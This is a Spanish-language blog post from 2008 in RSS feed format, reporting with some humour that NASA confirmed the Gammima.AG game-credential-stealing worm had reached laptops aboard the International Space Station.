		<pubDate>Wed, 27 Aug 2008 20:13:00 +0000</pubDate>
		<dc:creator>Fernando</dc:creator>
				<category><![CDATA[Actualidad]]></category>
		<category><![CDATA[Sociedad]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[Tecnología]]></category>
		<category><![CDATA[NASA]]></category>
		<category><![CDATA[Virus]]></category>
		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://ciberprensa.com/?p=2686</guid>
		<description><![CDATA[La NASA ha confirmado que el Virus conocido como Gammima.AG ha viajado al espacio en los ordenadores de los astronautas, en concreto a la Estación Espacial Internacional. Este virus, que afecta a Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, y Windows XP se detectó en la Tierra en Agosto [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: left;">La <strong><a href="http://ciberprensa.com/tag/nasa/" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con NASA">NASA</a></strong> ha confirmado que <strong>el <a href="http://ciberprensa.com/tag/virus/" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Virus">Virus</a> conocido como <a href="http://www.symantec.com/security_response/writeup.jsp?docid=2007-082706-1742-99&amp;tabid=2" target="_blank">Gammima.AG</a> ha viajado al espacio</strong> en los ordenadores de los astronautas, en concreto a la <a href="http://www.nasa.gov/topics/shuttle_station/index.html">Estación Espacial Internacional</a>.</p>
<p style="text-align: center;"><img class="size-full wp-image-2688 aligncenter" title="heatvision-02" src="http://ciberprensa.com/wp-content/uploads/2008/08/heatvision-02.jpg" alt="" width="350" height="236" /></p>
<p>Este virus, que a<strong>fecta a <a href="http://ciberprensa.com/tag/windows/" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Windows">Windows</a></strong> 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003,  y Windows XP <strong>se detectó en la Tierra en Agosto del año pasado</strong>, mucho antes de su inesperado viaje al espacio. <strong>Gammima AG</strong> se usa principalmente para robar datos de registro en juegos online, así que a ver en que emplean su tiempo los astronautas.</p>
<p><span id="more-2686"></span></p>
<p>Pero es aún mejor pues<strong> la Nasa ha dicho que no es la primera vez que virus de ordenador han viajado al espacio</strong>, y que están investigando como se han infectado las máquinas afectadas. <strong>¡Que fuerte!</strong></p>
<p>Es probable que los ordenadores de la Estación Espacial estén ahora mismo ejecutando <strong>un sistema operativo inseguro conocido como Windows</strong> así que <strong>si contactamos con extraterrestres es posible que lo primero que intercambiemos con ellos sean juegos infectados.</strong></p>
<p>Normalmente digo eso de &#8220;<em>Pena de país</em>&#8220;, pero en este caso hay que extrapolar la expresión a algo como &#8220;<strong><em>Pena de Planeta</em></strong>&#8220;.</p>
<p align="center"><a href="http://ciberprensa.com/wp-content/uploads/2008/08/111641main_resupply_image_011hires.jpg" rel="shadowbox[sbpost-2686];player=img;"><img class="aligncenter size-full wp-image-2687" title="111641main_resupply_image_011hires" src="http://ciberprensa.com/wp-content/uploads/2008/08/111641main_resupply_image_011hires.jpg" alt="" width="500" height="340" /></a></p>
<p>Aluciné leyendo esto <a href="http://www.9to5mac.com/space_virus">en 9 to 5 Mac</a>.</p>

	<h3>Artículos Relacionados:</h3>
	<ul class="st-related-posts">
	<li><a href="http://ayudawordpress.com/inyeccion-de-codigo-en-wordpress-a-traves-de-un-falso-antivirus/" title="Inyección de código en WordPress – antivirus falso (Martes, 6 de marzo de 2012)">Inyección de código en WordPress – antivirus falso</a></li>
	<li><a href="http://ayudawordpress.com/seguridad-wordpress/" title="15 maneras de asegurar WordPress (Martes, 3 de enero de 2012)">15 maneras de asegurar WordPress</a></li>
	<li><a href="http://ayudawordpress.com/wp-wizard/" title="WP Wizard, un asistente para preparar tu WordPress a medida (Jueves, 29 de diciembre de 2011)">WP Wizard, un asistente para preparar tu WordPress a medida</a></li>
	<li><a href="http://ayudawordpress.com/instala-wordpress-sin-instalarlo/" title="Instala WordPress sin instalarlo (Jueves, 17 de noviembre de 2011)">Instala WordPress sin instalarlo</a></li>
	<li><a href="http://ayudawordpress.com/convierte-de-texto-a-voz-tus-entradas/" title="Convierte de texto a voz tus entradas (Jueves, 22 de septiembre de 2011)">Convierte de texto a voz tus entradas</a></li>
</ul>

]]></content:encoded>
			<wfw:commentRss>http://ciberprensa.com/los-virus-windows-invaden-el-espacio-exterior/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
	</channel>
</rss>

